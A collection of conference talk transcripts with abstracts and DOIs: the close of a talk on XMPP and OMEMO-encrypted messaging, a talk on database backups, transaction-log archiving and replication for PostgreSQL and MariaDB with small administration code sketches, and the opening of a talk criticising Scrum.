And as one can imagine, government organizations and the military in general have some special requirements that are not already covered by existing extensions. So what did they do? Did they just think XMPP doesn't solve our problem, let's invent something else? No, of course not. They came up with an extension. And this is why there is now an extension that labels individual messages with security clearances and things like that, because you do need this in a military environment. But this opens up the question: what's the difference between NATO and WhatsApp? Well, it's easy: it's their revenue model. NATO basically pays a company to develop an instant messaging solution for them, and having the protocol standardized can only be beneficial to them, because in theory, after the contract expires, they can hire someone else to keep developing the instant messaging solution. So NATO, as a user, pays someone to develop something. In the case of WhatsApp, the revenue model looks entirely different: the user doesn't pay for anything. What WhatsApp relies on is, I guess, inflating the investment bubble, with the vague argument that at some point, when they have enough metadata, they can sell very, very targeted advertisement. But inflating that bubble relies on growth, on gaining more users every day. And in a federated world where clients and servers are interchangeable, that's not possible. I, for example, have no idea how many people are using Conversations, because of course I have the download numbers from the Google Play Store, but I don't have any download numbers from F-Droid, for example, or from the admittedly few people who build it themselves. I also can't account for all the forks of Conversations that are out there. By the way, if you've ever wondered why Open Whisper Systems is so reluctant to have their Signal app on F-Droid, that's one reason: when everybody uses Google Play, they have a better overview of how many users they have. So if we wanted to change all that, we would have to start paying for the services or software directly. Remember when I said implementing OMEMO is boring and unmotivating work? Two of the implementations that exist or are being developed are actually being worked on by paid developers. What if we stopped relying on volunteers to develop our software for us, and instead paid someone to do it — like we pay everyone else in our society? And you don't even need a large user base to make this work. Take Conversations, for example, which, admittedly, is a rather small open source product compared to others. If everyone who uses Conversations had bought it on the Play Store for about $2, I would actually be able to make a decent living off of this. Or in other terms: even a fairly small user base, like the one Conversations has, would be able to pay for a full-time developer. And well, I guess if you are fine with a few large companies controlling our most important form of communication, we don't have to do anything: they will continue to act in the interest of their investors, and the current mess of incompatible instant messaging solutions will continue, as it is a consequence of the business model. However, if you are unsatisfied with the current situation, we should stop relying on the work of a few volunteers and actually start paying for the software and services we use on a daily basis. Well, thank you. OK.
There is now one more thing, actually; I announced this on Twitter a couple of days ago. It's been a very interesting year since we introduced OMEMO last August. We saw the Gajim OMEMO plug-in come to life in December, which was an important step because it actually allowed us to enjoy the multi-device aspect of OMEMO. In March I released OMEMO-encrypted group chats on top of MUC, which proved that MUC is capable of handling end-to-end encrypted group chats. We also sorted out some licensing issues that had stopped the ChatSecure developers from implementing OMEMO for ChatSecure on iOS, and they are actually working on that now. And while I don't have an official ETA for OMEMO on iOS, I'm fairly certain it will happen this year. After all, ChatSecure on iOS has already made huge progress this year and implemented push notifications, which finally allow us to reliably receive messages on iOS, which was unfortunately impossible before. However, one important thing for OMEMO was missing, and that's an independent security audit. Well, it was missing until now, and I'm very happy to announce that I can finally make this audit public. I've actually been sitting on it for a couple of months; we had some things to sort out with the company that paid for it. If you have ever read a pen test or an audit before: this is actually one of the better ones, it's pretty nice to read. It was done by very competent people at a security company called Radically Open Security, based in the Netherlands, and it was paid for by a very nice company called the Pacific Research Alliance. It covers both the protocol itself and the implementation in Conversations. And to quickly reiterate my earlier point: this audit only came to happen because someone had a commercial interest in Conversations and needed it. It wasn't paid for by donations, and it certainly wasn't done by someone who volunteered. So yeah, that's about it. Questions? We have a microphone, I guess. — You said there were two main developers of MIX, and that some people, instead of waiting for MIX or trying to get their own ideas in, developed other protocols based on the current MUC solution. Is there anything in the current MIX protocol that you think might be a problem, which might be because it's only produced by two developers from one company who might have vested interests in only implementing some of the ideas? — Yeah. Like I said, MIX — the actual XEP, the entire text — was written down by two people, and that happened behind closed doors, so you didn't have an ETA for it. But the features in MIX were actually discussed in a public place with a lot of different XMPP users from various companies. For example, there are so-called XMPP summits twice a year where the larger XMPP community gathers, and we actually discussed MIX for an entire day or so. — Okay, so you don't think there are any bigger problems in MIX, cool ideas which could have been included but weren't because the company which pays the two developers might not want them included? You think it's a good and open process, and that the MIX protocol itself is actually very good and — No, I don't think so. — Okay. — And in any case, once it's public, you could in theory get your own changes in if that were necessary.
Of course, you could always fork it if you wanted. — No, you wouldn't necessarily have to fork it; you just have to convince the rest of the XMPP Standards Foundation to accept your change. — Thanks. — Okay, are there any other questions? Okay, thank you. If you want, I do have stickers with me; if anyone wants some, just meet me up here. Okay, thank you. Thank you very much. Thank you.
|
The world of Instant Messaging is populated with hundreds of providers - all incompatible with each other though history has shown that walled gardens are not sustainable. Why are we unable to agree upon a standard to communicate with each other?
|
10.5446/32420 (DOI)
|
Yes, a wonderful good morning. Christian, please give me a sign five or ten minutes before the end, because I have no overview of the time — my presenter mode isn't working either. And the heading was missing here; for some reason I must have deleted it by accident earlier. Great, now the heading is there too. Sorry. Is there somebody in this room who prefers English? Okay, then I will do it in English. So, we had a little bit of a problem with the technology, and we want to discuss database high availability. As usual, my slides are only valid together with the talk, not on their own. So, who am I? My name is Susanne Holzgräfer. When you google just for my name, it's very funny, you will find nothing, because I married three years ago and changed my name. When you google for my birth name, you will find 120 pages and more, and if you search for my nick you will also find a lot. Today I work as a senior consultant and senior trainer for PostgreSQL, MariaDB and of course MySQL. From 2000 up to 2012 or 2013 I was part of the PostgreSQL developer team — I worked on PostgreSQL, mostly on the parser — and I also worked for MySQL, first as a developer and later as a senior support engineer, trainer, consultant and so on. So I am one of the two persons in the world who have development experience both in the PostgreSQL project and at MySQL. I have been active in the database business since about 2000 or 2001, and in the open source community since 1996; I started with Debian. I got my diploma in computer science and did PhD studies around big data, geoinformatics and geodetic measurements of the earth. I am a freelancer and also a speaker, and I have written hundreds of articles about PostgreSQL, MySQL and so on. Oh, and he said I should not go too far into the corner. So, we start with high availability. When you ask about high availability, you usually ask about backups first. So, what do you think: why do you need a backup, why do you need a restore? — Because servers fail. — Any other ideas? Why do you need a backup? — Table drops. — Yes, table drops. The Germans call it a "Wurstfinger" mistake: the typical fat-finger mistakes you make by accident. You wanted to reinstall another server, the test server, but you reinstall the production server instead — that happens too. So: for the case that you lose your data. Do you still need a backup when you have a RAID system? Okay, I think that was clear. What do you need to back up? Do you need to back up your operating system, or just your data? These are the classic questions. Usually you don't need to back up the operating system, because you can easily download it again and install a newer version. And you don't really need to back up the PostgreSQL or MySQL installation itself either, because you can easily reinstall it. What you do need to back up is the data: in databases you need to back up the data directory, or the content of the data directory, so that you have all your own data available for a restore. How often do you need to back up? Every night, every week, every day? It depends on the importance of your data: when you can live with losing one day of data, then one backup per day might be enough. And for how long do you need to store your backups? Yeah.
First, it depends on the law, because we have laws that require you to delete data — and when a law says you have to delete certain data, it should not be in any backup either. Say you make a backup today, another one next week, and you keep doing it weekly. After two weeks you have three backups, and you test whether you can restore the latest one; you don't need the oldest one anymore, because you have the other two, so you can delete or overwrite it. So the question is how many backups you need and when you will recycle or delete them. I often have this discussion: "but the data is still in the backup!" — no, because you make a backup every week. Even with incremental backups every night: I start deleting some values today, the coming night there will be an incremental backup, and tomorrow my backup won't have those values anymore. So I don't need to think about how to get old data out of the backup, and I don't need to store backups for years. I'm not sure about the banking business, whether they really need to keep backups for ten years or so, but usually you need two or three backups and then you can recycle the backup space. And it is a space question: when you have a huge database of 300 or 400 GB, you don't want to keep a full backup from every single night. So, in the database world we distinguish between logical and physical backups. And now I have to ask: who of you is using MariaDB? Okay. Who of you is using PostgreSQL? Who of you is using anything else — Oracle? Did you ever use MySQL or MariaDB or PostgreSQL? Okay. I could ask: who doesn't know what a dump is? Okay. So, a logical backup is a dump. There are advantages to a dump, and there are also disadvantages. Let's look at the procedure of a dump. This is a timeline. Let's say you make a dump here, for example at two o'clock in the night, so you have a dump file from two o'clock last night. And somewhere during the business day you have a big crash — a lightning strike in the data center, everything down, not even the emergency light works anymore — or you did the classic "drop table" in the wrong terminal, whatever. So you have a crash here, the point at which you decide that you need to restore the backup. Then you can use this dump, and when you restore it, you will have everything up to the point of the dump, but not the transactions that had not finished. Think of four CPUs, four processes throwing transactions at the database: this transaction here won't be in the dump, and that one won't be in the dump either, because the database systems take a snapshot for the dump and include only the transactions committed at the time the dump starts. So you have these, but not the unfinished transactions. And then you have a big loss of activity: everything you did between your dump and your crash is gone, you don't have it, you can't restore it. And that might be a full business day.
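For reference, taking such a nightly dump is usually a single command; here is a hedged sketch assuming a local PostgreSQL instance, with the database name and target path as pure placeholders (for MariaDB/MySQL the rough equivalent would be mysqldump --single-transaction):

    import datetime
    import subprocess

    def nightly_dump(dbname="shop", target_dir="/var/backups/db"):
        stamp = datetime.date.today().isoformat()
        outfile = f"{target_dir}/{dbname}-{stamp}.dump"
        # -Fc = custom format (already compressed). The dump is a consistent
        # snapshot of everything committed at the moment the dump starts;
        # transactions still running at that point are not included.
        subprocess.run(["pg_dump", "-Fc", "-f", outfile, dbname], check=True)
        return outfile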
I deliberately said lost activities, not lost data, because everything you have done during that whole business day is lost. That is also money, and it is a lot of time, because you have to do it all again. After the recovery is done, you just have the status from the time of the dump, so you have to redo everything you did — maybe you don't need to redo it, but then it wasn't important what you did the whole day; usually you need to redo it. That's the disadvantage of a dump. The advantage of a dump is that it is plain — usually a plain SQL file, a text file — and you can compress it, so it is smaller in any case; it is way smaller than your data directory when you have indexes on your tables. And it is very simple. Of course you have all the data from your tables in your dump, that space is similar, but you don't have a copy of your indexes, because in the dump you will just find "CREATE INDEX" statements; none of the stored index data is in there, so the space you need for the dump is much less than for the data directory. The disadvantage is that on restore you need to rebuild all the indexes, and that can take a very, very long time. A dump restore on the open source database systems essentially runs one process per statement: you can use more processes overall, but each statement is a single process, so you can't split one CREATE INDEX across several CPUs. So your database will do lots of I/O on recovery, and it might take very long, because you need to rebuild the indexes. The second option is the physical backup. A physical backup means you have a physical copy of your data directory — a real copy. It can be compressed, it can be whatever, but it has to be a real copy. I once wrote an article, and the editor had the idea that you don't need a real copy; I had a big discussion with him, so when you read something odd in that article, it's not from me — I said, no, you need a real copy, otherwise it's not a backup. So, physical backup: is it clever to just copy the data directory without thinking about it, like some file system backup tools do — they just take the data directory and copy it while the database is running? That doesn't make sense, because most of your database lives in cache. You get the best performance when your whole database fits in RAM, and that happens very often: most databases aren't that big and RAM is very cheap, so lots of databases fit in RAM — and when the database doesn't fit in RAM, it's slow. So you have a big cache where things live, and when you just copy the files from the file system while the server is running, you lose everything that is only in RAM, and you usually can't restore such a copy; the systems won't restore it. So you need to use the mechanisms of the database system to make the backup. One option is a cold backup. A cold backup means you stop the server — you shut it down with "systemctl stop" or "service ... stop" — and the server usually waits for open transactions, so you have those as well. And then you can make a copy of your data directory, however you want to do it, using rsync or whatever else.
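The cold-backup procedure boils down to three steps; a hedged sketch, assuming a systemd-managed PostgreSQL service and placeholder paths, could look like this:

    import subprocess

    def cold_backup(datadir="/var/lib/postgresql/14/main",
                    target="/var/backups/base/",
                    service="postgresql"):
        # Stop the server so all transactions are closed and flushed to disk.
        subprocess.run(["systemctl", "stop", service], check=True)
        try:
            # -a preserves permissions and ownership; any file copy tool works.
            subprocess.run(["rsync", "-a", datadir, target], check=True)
        finally:
            subprocess.run(["systemctl", "start", service], check=True)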
And after you have a copy of your data directory, you can start the system again. The big advantage of having a file-system copy, a data-directory copy, is that you also have the information about the transaction log — about the transactions. The system knows which transactions are already stored on disk and which ones exist only in the transaction log. Database systems typically flush to disk roughly every five minutes by default: they permanently record the changes in the transaction log, and every five minutes or so they flush all the dirty pages onto the disk. In reality it's a bit more continuous than that, but five minutes is a good value to keep in mind. So what you need — and it is strongly recommended — is to archive, to copy, to back up the transaction logs, because then you have all transactions. Transaction logs get overwritten. In MariaDB you can configure this; by default the transaction log is never overwritten, but with a database that sees real traffic you will notice after some hours that this is not a good idea, because it needs a lot of space. In a well-configured PostgreSQL system the transaction log will be overwritten every ten to eleven minutes. So you need to back them up, to archive them — you need to copy each transaction log away before it gets overwritten. In MySQL or MariaDB you can set expire_logs_days, usually to something like three days; it depends on your database system. The point is that you have the transaction logs when you need to restore: you need to make sure you have archived every transaction log from the moment of the backup onwards. And then, when you restore, you do the recovery with your backup, and on top of that you restore all the archived transactions. So you have only lost the activities between the crash and the end of the recovery, and the system is fully recovered. That's not much time, so you won't lose what you did during the whole day, because it is all still there. The recovery will usually take a few minutes — it depends on how much traffic you have, maybe half an hour, maybe an hour; my experience is a few minutes. I have one example where it was much more, but typically it's a few minutes, and then the system has replayed the transaction logs too, you can start working again, and you have lost nothing. You only lose the transactions that weren't finished at crash time, plus the time for the recovery itself — that is some service downtime, but it's not the full day. We once recovered from a backup that was two years old, and we had all the transaction logs. That was during a training at a customer. We started the recovery in the morning at nine o'clock, didn't pay much attention to it, and when we looked before lunch it was done — the server was up again and they could use it again. So even with two years of transactions and just an old backup it works; it simply takes a bit longer. That's not the typical use case, of course; usually you have a backup from three days ago or from last week.
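On the archiving side, here is a hedged sketch of what the transaction-log copy can look like for PostgreSQL: a tiny script that archive_command could call with the segment path (%p) and file name (%f), for example archive_command = '/usr/local/bin/archive_wal.py %p %f'. The archive directory is a placeholder; on MariaDB/MySQL you would instead keep and copy the binary logs (e.g. with expire_logs_days set high enough):

    #!/usr/bin/env python3
    import os
    import shutil
    import sys

    def main():
        segment_path, segment_name = sys.argv[1], sys.argv[2]
        archive_dir = "/var/backups/wal_archive"
        target = os.path.join(archive_dir, segment_name)
        if os.path.exists(target):
            # Never silently overwrite an archived segment; a non-zero exit
            # tells PostgreSQL that archiving failed, so it keeps the segment.
            sys.exit(1)
        shutil.copy2(segment_path, target)

    if __name__ == "__main__":
        main()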
Often I even see backups from last night, so there are not that many transactions to replay. But as I said, even a very old backup works. So, that was the cold backup — but with a cold backup you also lose activity during the backup itself: when you have a 300 or 400 GB data directory, copying it takes time. I once had a customer who gave me a service window of 15 minutes in which I was supposed to copy an 800 GB data directory. I said no — even the copy alone takes longer than 15 minutes, even when copying to the same disk. So it depends on how big your database is how long that copy takes, and during that time your business can't do anything database-related. So you want to do it hot. That is possible, but you should not do it by just copying the file system while the server is running, because then you don't know what happens to the transactions during the backup. What the open source database systems, or the tools around them, do is set a flag — I call it that — when the backup starts, and then you can take the backup of the data directory. There are tools for this: in PostgreSQL you can do it manually with start backup and stop backup and copy the directory however you want, or there is pg_basebackup, which does the start backup, the copy of the data directory and the stop backup for you; the same exists for MySQL and MariaDB with XtraBackup. So you have a start-backup flag that goes into the transaction logs, so the logs know that somewhere in the stream of transactions a backup starts; and when you finish your backup there is a stop flag, so the system knows where the backup started and where it stopped. It then knows which transactions are not contained in the backup — and those are already in the transaction logs, because any transaction that finished in that window is in the transaction log anyway. On restore, you first restore the base backup, which brings you to this point; then you have the transactions that happened between start and stop; and after that you simply restore all your other archived transaction logs, and you are done. So here you have no lost activity at all while the backup is running; you only lose activity during the recovery. That is the best approach, with a minimum of lost activity. The other big advantage: when you think about replication — and we will come to replication in a moment — you can take such a backup from your master system without any performance loss on the master, and restore it on the slave. So, you have a backup, and a backup is okay, but it's like my heating pump: I have a spare heating pump somewhere in the cellar, and when my heating pump fails I first have to install it. That's okay, but it would be better to have the second heating pump already installed, because then I just need to switch over.
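Before moving from backups to high availability, here is a hedged sketch of the hot base backup just described, assuming a local PostgreSQL instance and a replication-capable user; paths and the user name are placeholders (on MariaDB/MySQL, XtraBackup plays this role):

    import subprocess

    def hot_base_backup(target="/var/backups/base/today", user="replicator"):
        subprocess.run([
            "pg_basebackup",
            "-D", target,      # empty target directory for the copy
            "-U", user,
            "-X", "stream",    # also stream the transaction log written
                               # between the start and the stop of the backup
            "-P",              # print progress
        ], check=True)

The same copy can later serve as the starting point for a replica, which is exactly the replication advantage mentioned above.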
So, high availability. When we talk about high availability, there is a definition for it, and the definition is that you always have two systems up when one has failed — two systems where you can immediately switch over, so that you never run on a single server. That means high availability really starts with three servers: when one server goes away, you still have two, and it doesn't matter which one is failing or crashing, or whether you simply have maintenance work to do on one of them — you still have two others. When the next earthquake comes, you might in the worst case be left with a single server, but the important thing is that in normal operation you never have just one; you always have at least two. So, replication concepts. There is the standalone server: transactions come in, writing and reading happen on a single server — that's the old way. Then there is warm replication — we don't really do that anymore today — which is a kind of log shipping, what people used before replication: reading and writing happen here, and the transactions are shipped over there; you have a backup plus the transactions on the other machine, and it stands by — the server is on, it has power and it is running, but you still need to do some magic before you can actually use the data. That's warm replication. Then you have hot replication: reading here, writing here, and you can immediately read from the other node as well. And we have master-master: you can read and write on both, and they learn the changes from each other. MySQL talks about master and slave — the one you can write to is the master, the others are slaves — but people figured out that this is not good naming, because when the slave becomes the master, then the master is the one that used to be the slave, and over the years you get confused. PostgreSQL tried it with primary and standby, but you have the same situation: when the standby becomes the primary, you get confused again. When you switch more often and you have two administrators, and one of them talks about "the primary", you don't know which one is meant — the old one, the new one, or the one from last week — and you always have to ask which server is actually the master right now. What you can do with such a setup is send all your SELECT queries to the slaves; you can do load balancing across them for the reads. I have a lot of people who want master-master replication, and I always ask why. They say: because I have so many writes on my server, I want to share them with another server. But for writes this doesn't help, because each node gets the writes from the direct input plus the I/O from replaying the input of the other server — you don't win anything on write I/O. You can only load-balance the reads, not the writes, on these systems. There are systems built for scaling writes: the cluster systems. The Oracle tool is MySQL Cluster — and that is not just "a cluster of MySQL servers", MySQL Cluster is a product of its own; it did not start out as an open source MySQL development, it was developed at Ericsson, and it does a lot of NoSQL-style work in the back end. Galera is another such cluster system. If you have such a cluster, you can write to all nodes at the same time, but that works on a different level; it is not a plain single relational database anymore. And then we have the asynchronous versus synchronous discussion. Asynchronous is, I think, quickly explained — I don't have to say much about what happens when the network goes down.
The transaction logs here will pile up — more and more and more. When the network is back, all those transactions are sent to the slave, to the other node. Strictly speaking, saying "the master sends to the slave" is the wrong way around; in reality the slave connects to the master and asks it for the transactions. It's like a king and his servant: the master, the king, will never walk over to the slave and hand something over — the slave has to go to the king and pick it up. That's how it actually works, but it is easier to draw it the other way around. So the transactions are streamed — asynchronously. Now, synchronous. Synchronous is a fun one (and we have the slide-flipping problem again; something is off with the presentation). Synchronous means that your commit is only acknowledged once the change has been written to the hard disks of all servers: you say "commit", and the system makes sure the change is stored on disk on every server before your commit finally returns. And what happens when the network breaks? You will never get the acknowledgement, because the change can never be stored on all servers. So with synchronous replication your commits hang and everything stops for as long as the network is down. Then there is semi-synchronous — I like that word. It doesn't wait until the change is stored on disk everywhere; it waits until it is in the caches of all servers, and then you get your acknowledgement. But again: when the network is down here, you don't get an answer back and you cannot keep working. The other disadvantage of synchronous replication is the speed of light. You can calculate it. I once heard this from Kristian Köhntopp — I think it was at FrOSCon — where he wanted to jump around on stage to demonstrate the frequency. And a colleague, Greg Smith, once calculated it for the distance between Baltimore and Amsterdam, something like 15,000 kilometres round trip, and you end up with about 9 or 10 transactions per second. So you lose a lot of performance with synchronous transactions over distance. Here is something I already said: with modern open source relational database systems it is very easy to attach a new slave system — in MySQL terms, a new slave. You take a hot backup plus the archived transaction logs, restore them on the new node, and then everything comes in automatically and the newly arriving transactions are applied as well, because the replication systems simply ship the transactions of the original system — the transaction log of the original system. So, how much time do I have? Two minutes? Okay, this is my last slide. Some setups I see very often at my customers — and I have a lot of customers; I have hosters as customers who themselves have many database customers, so I see the administration side and their customers, communication companies and so on. What I see very often is this scenario: they have many nodes, many more nodes than two.
But they have two nodes that are set up as master-master replication — and the master-master part is really only there for the writes; the application needs those two only for writing, and the reads actually go through a load balancer across all of these nodes. And they use Corosync. Corosync assigns an IP address to one of the two nodes; in my example it is 10.0.0.2. So for the application the database system is 10.0.0.2, and Corosync makes sure that one of the nodes — say node foo — actually holds 10.0.0.2. When node foo fails, or when I have service maintenance work to do on it, Corosync moves 10.0.0.2 over to the other node, and the transactions go in there. And when foo is back — after you have patched it or whatever — it receives all the transactions through the replication and is back on the same level again. So you lose almost nothing; you only lose the short time Corosync needs to switch the IP address over to the other node. This is a very simple setup. It works, and it works well. And you can easily update one node, or even the whole server — sometimes you have to update the operating system because you are still running Potato or something. It is very simple, and you don't have to go to MySQL Cluster or Galera and so on, or the PostgreSQL cluster solutions, or MongoDB or CouchDB — you can do it with plain relational systems. Yes, that is my last slide. Questions? Questions? Yes. — Thank you for the presentation. Okay, so a synchronous master-master replication would be better in a perfect world, but the more synchronous you are, the more performance you lose — That is the asynchronous setup, not synchronous. — Asynchronous, yes, sorry, I meant the asynchronous master-master setup. What about the performance? There is a trade-off between the safety of the data and the performance. From your experience, how do you handle that trade-off? — The question is what you mean by performance: I have not seen any performance lost here; it is not more than something like 0.01 microseconds. When this was measured for a master-slave setup, I believe it was about one nanosecond or so — so you essentially lose no performance. — Excuse me, but in this architecture you still ship the transaction logs between the nodes? — Yes, of course, and you have the network speed and the speed of light; the transactions are streamed. Yes, they are streamed. — But between master and master there is no streaming? — There is streaming, that is streaming too. — But with the asynchronous setup — I'm thinking of Postgres, you mentioned Postgres — can you really have near-real-time replication without the application losing performance? — In my experience, when you tell customers that they will lose performance as soon as they leave the data center, they say: okay, asynchronous is good enough. I really don't have a single customer where we ended up with a synchronous setup. — No? Okay. Thank you. — Over there in the back, yes? I see a few hands. Wait, can you wait for the microphone? It is easier, otherwise I have to speak a bit louder, because... Yes, sorry. Okay. — I have a purely hypothetical setup; I'm just wondering whether it would work, based on what you showed.
I have high availability on two physical machines, with replication between the two. One is the master and the other is just there, on standby. When the master crashes and I automatically fail over to the slave, can I get into a situation where there are transactions that were not committed? In this setup, if I have lost a transaction, can I get back to my original data or not? The thing is, if both systems have the same data on disk, they have exactly the same state — but when one of them crashes at some point, can I roll the transactions forward or back using the logs? — The question is what happens to uncommitted transactions on a crash. And of course you cannot recover an uncommitted transaction: it is rolled back the moment the crash happens. But the advantage is precisely that it was not committed — you never lose committed transactions anywhere in the system. There are always uncommitted transactions in flight; if the system crashes and you have, say, 100 transactions that are not yet committed, then you lose exactly those 100 transactions and nothing more. — And, yes. Thank you. — Olli, over to Olli. — Yes, you said synchronous replication costs performance. Is synchronous replication okay when you have only 15 centimetres of wire between the servers — when everything is in the same data center anyway? — The question is why you have the replica that close in the same data center. You can have the replica in the same data center or in another room — not in the same room, but in a different rack, on a different power circuit and so on. If you want to ask me why you wouldn't separate them further, I would ask you back why not. — What kind of rack? It is the rack the servers and their wires are in. We have two data centers on one campus, seven kilometres apart, connected by fiber — but here we are talking about 15 centimetres of fiber or copper. We already have the problems we have with the fully synchronous metro cluster, the fully synchronous VMs and everything else — that is the Microsoft side. Of course we can also replicate between the two data centers; that is another layer of safety, and we do have that replication. — But even then you still have the problem of what happens when the wires, the network, fail, or when something small goes wrong and you get a hardware failure or so. With a synchronous system you have many failure situations: the network can fail, the wires can fail, and every time the result is that nothing works anymore — you are stuck and you have to repair it before anything works again, and you lose all the activity of your business day. And when a wire in a data center breaks and you have to call the data center to fix it, that is not as easy and fast as you might think: you call the data center, and it is not done by a student in five minutes. My experience is that data centers take a very long time when you need them for that kind of repair; you can easily wait hours, and during that time you cannot do any business. Then it becomes a question of what happens to your data center as a whole. I think in this situation it is usually enough to stay within the same data center.
Because there you have a redundant system: redundant power and network, redundant power supplies and so on. Of course you could also build a boat on the roof, because the North Sea might arrive here one day. — That was the question, in a way. — There is middleware that also does load balancing for PostgreSQL. Doesn't that help to combine streaming replication with load balancing between master and master? You remember that we have middleware for load balancing and for replication as well? — Replication is streaming: replication means you stream the log files. Load balancing is a second, separate technology — that is network technology. — But Slony also says it helps with load balancing, streaming between the two master servers. So we could have load balancing between the four servers. — But Slony does not have a master-master feature, as far as I know. What you have is software from third-party vendors that offers both load balancing and replication — that is like my LibreOffice: I can write texts and I can write documents or presentations; it is the same piece of software, you just use different features of it. — Yes, of course. Yes. Okay. No? I thought I saw a hand. No. Okay. Thank you for your time. I hope you enjoy a nice weekend here at FrOSCon. I don't know what the next talk is — I hope the next presenter doesn't have as much trouble with the technology as I did.
|
Database high availability is no magic anymore. What do you need for high availability. How important are backups? How important is replication? How can you do all this without master downtime? How can you manage high availability with open source / free software tools? The talk will be mostly product independent. Mostly considered database worlds are MariaDB and PostgreSQL.
|
10.5446/32425 (DOI)
|
If you were to read the definition of something — let's call it X — that said that for X there are certain roles, artifacts, events and rules that have to be defined somewhere, that these roles, artifacts, events and rules are immutable, and that although implementing only parts of X is possible, the result is not X — if you read something like this and you're wired like me, then perhaps you might think we're talking about a radical political ideology, or maybe a religious cult, or something of that nature. In fact, the X we're talking about is Scrum, by its own definition. This is a direct quote from the Scrum Guide by Ken Schwaber and Jeff Sutherland, which by its own definition is the definitive reference to Scrum. So when we're talking about actually implementing Scrum, we first have to think about what it actually is. What is Scrum, really? The thing is that Scrum, even by its own definition, isn't exactly sure what it is, because the opening paragraph of the Scrum Guide says that Scrum is a framework for developing and sustaining complex products. Fine, that sounds relatively reasonable. But then you get to the part labelled "definition", where it says: a framework within which people can address complex adaptive problems while productively and creatively delivering products of the highest possible value. I think a few bingo cards just went off. By the way, just for the sake of completeness, Wikipedia has an alternative definition; Wikipedia says it's an iterative and incremental agile software development framework for managing product development, which I guess is sort of a retroactive definition. Regardless, as you can see, that's basically a bunch of jumbled buzzwords. And it's been like that since about 1995. Ken Schwaber and Jeff Sutherland, who are frequently referred to as "Ken and Jeff" in the Scrum literature, first presented Scrum in 1995, so it's a little over 20 years old by now. They claim that it had previously been, and I quote, tried and refined before they formalized it and first presented it at a conference in 1995, at companies like Individual — that was a news feed company that was subsequently acquired; after a series of acquisitions it's now part of Reuters — Fidelity Investments, which still exists today, and IDX Systems, which is now part of GE Healthcare, also via a series of acquisitions. So they're saying that by the time they first wrote it down and presented it in 1995, it had already been tried and refined, successfully, in actual development use at a bunch of companies. Now, I don't believe any of that, but that's what they say. So what is Scrum like? Again, this is taken directly from the Scrum Guide. Scrum is said to be — and these are a few buzzwords that should really set off some alarm bells if you've ever read anything like this before — lightweight, simple to understand, but difficult to master. I think that is actually a stroke of genius, because what the authors managed to put into the very definition of their method is the possibility of you, me and everyone else simply being too stupid to do it — because, remember, it's difficult to master, so maybe you're just incompetent and you're doing it wrong.
Also lightweight and simple to understand let me translate that for you that's basically well we're not actually defining a whole lot but at least we're describing that in simple terms. So it's basically more or less almost nothing. So let's look at some of the things that scrum actually postulates. Some of these it postulates explicitly, some of them are implicit and sort of underpin the idea of scrum or the ideas and the methods of scrum. And we shouldn't just look at what scrum postulates but more importantly whether any of it actually makes any sense. So there's one very, very central tenet in scrum and this is one that by and large I'm actually not going to argue much about and that is scrum says teams self-organize. Now I think every one of you will at some point in their lives have been in a team that was perfectly capable of self-organization. I certainly was I'm sure you have so this is not something that I'm going to argue as being patently false. It's very clear and I think it's self-evident and self-explanatory that teams are capable of self-organizing. But from your own experience you'll probably agree with me that there must be, that we must meet a very critical precondition to teams actually being capable of self-organizing and that is stability. The more stable a team is, the less a team changes, the more it has a chance of actually becoming self-organizing. In contrast if teams constantly change they don't stand a snowball chance in hell of self-organizing. Now let's see how we can apply this to the software industry. There's two things that are true about the software industry which is one, we are a very growth oriented industry. If software companies are healthy they grow, they hire more people, they grow their teams, teams change. We're also a very competitive industry, competitive in the sense that employers, companies compete for developer talent. It's clearly more or less a seller's market when it comes to job talent in the software industry. So as a result both you or the colleague that you're working with might easily have an offer that's too good to turn down on their table next month. And then that's one of your colleagues that's gone from the team and maybe at the same time you're hiring a new person or maybe you're growing in so you're bringing more people onto the team. Now some of you may be familiar with something that's sort of almost an old rag in psychology, you know, Tuckman's stages of group development, some of you may have heard about that, it was first written down in 1965. You may have heard about this thing of where teams go through a forming, a storming, a norming, and performing stage, right? I'm not going to try and beat a dead horse here too much, this is all sort of very reasonably well known. And as anything in behavioral science is always under a certain degree of discussion. But I think what we can all agree with is that when a team goes through these stages and the evidence is pretty good that most teams do, then the moment there is a person joining or leaving a team, you have a new team and you effectively start over. Now you can have people who are very, very capable of dealing with these changes and then these phases are somewhat compressed and they take less time to complete. But the thing is your teams will go through these phases. And so the very idea, very basic postulate of Scrum goes out the window when we apply Scrum to the software industry. 
For the very simple reason that we're pretty much unable to meet this prerequisite of team stability. Let's talk about a few other things that are defined in Scrum. In Scrum, we have basically a time boxed time period, which is sort of our central unit of planning and that period is called a sprint. And the Scrum guide says that a sprint is one month or less. It doesn't really say much about anything else. In theory, you could have sprints that are one day in length. That doesn't really make a whole lot of sense. For most companies, it will be something like one month or half a month or maybe a week if they iterate extremely quickly. By the way, if your company is using sprints that are longer than one month, congratulations, your company is not using Scrum. Because remember, rules, roles, artifacts and events are immutable. And if you change anything, that's no longer Scrum. But the important thing is that Scrum expressly says every sprint is followed by another sprint like immediately without pause in between. It also says a few things about how a sprint should be organized from a sprint planning session to the actual development sprint that you're doing to a sprint retrospective and so forth. But the important thing is that every sprint is immediately followed by the next sprint. It strikes me as baffling how someone could come up with something like this because, effectively, it's like running the New York City marathon as a series of 100-meter dashes. That's not going to work too well. And software development is very much a long-distance sport. And I'm of the conviction that if you're organizing software development as one sprint after another sprint after another sprint, the only thing that this can possibly lead to is very, very profound exhaustion. And eventually, you're either going to run yourself into burnout or worse, you're going to do that to other people. Then there's this thing in Scrum. Again, this is an immutable event, the Daily Scrum. The Daily Scrum is defined, this is actually funny, it's defined as a time boxed event of exactly 15 minutes. Let's give them a benefit of a doubt here a little bit. So let's say it's approximately 15 minutes, but it can't be any longer. That involves the entire development team. And every member in the development team answers the following questions. One, what did I do yesterday to help my team achieve the sprint goals? Two, what am I doing today to help the team achieve the sprint goals? And three, what's holding me up? What are the obstacles that I see impeding myself or the rest of the team from making progress? Now I find it amusing that the authors of or the inventors of Scrum named their defining daily occurrence that is so defining that actually names the whole method overall after an event in a reasonably violent contact sport that is so potentially dangerous that professional practitioners of this sport recognize a safe word which they utter in the Scrum when they fear that their necks might be broken. If you're a professional rugby union player, people will recognize the safe word neck. If players are pushing down so hard on your own neck that you fear it might snap. I think it's really bizarre to use something like this as a metaphor for a daily team meeting. I think it's really, really weird. But that's just a technicality. That's just naming things. That's one of the two hard things in computer science, right? The other things are cash and validation and off by one errors. 
